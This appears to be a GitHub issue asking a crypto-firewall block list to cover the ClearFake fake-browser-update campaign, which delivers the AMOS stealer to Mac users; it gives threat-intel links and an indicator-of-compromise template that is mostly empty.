In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.
In October 2023, we saw a significant development for the malicious operation, which leveraged Binance Smart Chain contracts to hide its malicious scripts supporting the infection chain in the blockchain. This was blocked in issue: https://github.com/chartingshow/crypto-firewall/issues/151
Enhancement idea
ClearFake
MAC OS Update malware.Description
In an interesting new development, AMOS is now being delivered to Mac users via a fake browser update chain tracked as ‘ClearFake’. This may very well be the first time we see one of the main social engineering campaigns, previously reserved for Windows, branch out not only in terms of geolocation but also operating system.
In October 2023, we saw a significant development for the malicious operation, which leveraged Binance Smart Chain contracts to hide its malicious scripts supporting the infection chain in the blockchain. This was blocked in issue: https://github.com/chartingshow/crypto-firewall/issues/151
Links
https://www.malwarebytes.com/blog/threat-intelligence/2023/11/atomic-stealer-distributed-to-mac-users-via-fake-browser-updates
https://urlhaus.abuse.ch/browse/tag/ClearFake/
https://threatfox.abuse.ch/browse.php?search=malware%3AClearFake
IOC
I2P websites
n/a
IPFS websites
n/a
Tor2web websites
n/a
TOR websites
n/a
URL's
n/a
Folders
n/a
Sub-Domains
n/a
Domains
IP's
Emails
n/a
Wallet addresses
n/a
Mining pool addresses
n/a